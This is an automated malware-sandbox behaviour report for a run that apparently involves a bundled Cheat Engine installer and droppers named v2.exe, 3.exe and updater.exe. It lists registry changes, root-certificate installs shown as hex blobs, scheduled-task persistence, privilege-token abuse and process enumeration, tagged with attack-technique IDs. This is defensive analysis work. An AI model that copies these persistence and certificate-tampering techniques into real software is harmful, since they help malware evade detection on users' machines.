Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: avdump_x64_ais-c62.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "23"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_avg_crt_x86-7d5.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "20"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "27"	instup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "16"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "64"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "84"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "27"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "3"	instup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell\open\command	CCleanerSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon	CheatEngine75.tmp
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\SfxInstProgress = "50"	avg_antivirus_free_setup_x64.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "74"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "78"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: sbr_x64_ais-c62.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "34"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "41"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "90"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "13"	instup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell	CCleanerSetup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon\ = "C:\\Program Files\\Cheat Engine 7.5\\Cheat Engine.exe,0"	CheatEngine75.tmp
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "7"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "Updating package: instup_x64_ais"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "Extracting file: sbr.exe"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "83"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Main = "12"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Main = "75"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "25"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "87"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "68"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_avg_crt_x64-7d5.vpx"	instup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell\Open CCleaner...\command	CCleanerSetup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "36"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "71"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "98"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_cmp_datascan_x64-82e.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "25"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_shl_mai_x64-82e.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "33"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "18"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "59"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "Updating package: ais_cmp_gamingmode"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_dll_eng-818.vpx"	instup.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	avg_antivirus_free_setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	avg_antivirus_free_setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1552	schtasks.exe
1400	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2188	v2.exe
2188	v2.exe
2188	v2.exe
2560	3.exe
2560	3.exe
1084	powershell.exe
2560	3.exe
2560	3.exe
2560	3.exe
2560	3.exe
2560	3.exe
2560	3.exe
2860	powershell.exe
2188	v2.exe
2560	3.exe
2560	3.exe
2228	powershell.exe
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2668	CheatEngine75.tmp
2384	updater.exe
2384	updater.exe
1796	powershell.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2232	powershell.exe
2384	updater.exe
2384	updater.exe
1396	conhost.exe
1396	conhost.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
1084	conhost.exe
1084	conhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2668	CheatEngine75.tmp

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	2188	v2.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeShutdownPrivilege	3000	powercfg.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeShutdownPrivilege	1076	powercfg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	2288	powercfg.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeShutdownPrivilege	2572	powercfg.exe
